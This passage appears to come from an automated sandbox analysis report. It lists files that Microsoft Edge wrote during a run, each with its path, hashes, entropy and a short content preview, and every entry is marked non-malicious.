                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                                            MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                                            SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                                            SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                                            SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:117.0.2045.55

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3762b.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39cfc.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3af8a.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b046.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.5898156356912286
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLyeuAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isXuymds6BbrdFLt4l0r:TLyXOUOq0afDdWec9sJwziZ4Z7J5fc
                                                                                                                                                                                                                                                                                                                            MD5:DEE6B30FA987F315C47F9F5D037DA482
                                                                                                                                                                                                                                                                                                                            SHA1:3B439394FDBEE3E6322867EC8A77E6616C907D49
                                                                                                                                                                                                                                                                                                                            SHA-256:9EECB1D073647DBAC1040EA9743357EE284CAFFD01E68BA2CFCEF4705CD30F98
                                                                                                                                                                                                                                                                                                                            SHA-512:3697E9D5311E479E13AC5D5C51820BAA6B823E8F90C7FE7AB41E667BE462D712E21CAFD7BAD9B99CC3E78560F1920C2CB4E87AAFD791168DFD27355D04E56D5C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEjrrXF:/M/xT02zaXF
                                                                                                                                                                                                                                                                                                                            MD5:5193C55BE2D3F5497D7596B39377876D
                                                                                                                                                                                                                                                                                                                            SHA1:0A25106CA005623F6E005DEF4567BDC870844F01
                                                                                                                                                                                                                                                                                                                            SHA-256:415D4415888438A6C56F72A4C195BE3D1C61695CAC5B9416495A653A21FDC1A4
                                                                                                                                                                                                                                                                                                                            SHA-512:3962E77786E0712C5DB741442FB24402479FE4AE5E6F63F1A9B0D9A764394E9570CF3338F95DF680E0ED1D289AAE7D7BD6FB67430E2116070E4211B532037E84
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):47
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                            MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                            SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                            SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                            SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):35
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                            MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                            SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                            SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                            SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                            MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                            SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                            SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                            SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):130439
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                            MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                            SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                            SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                            SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                            MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                            SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                            SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                            SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
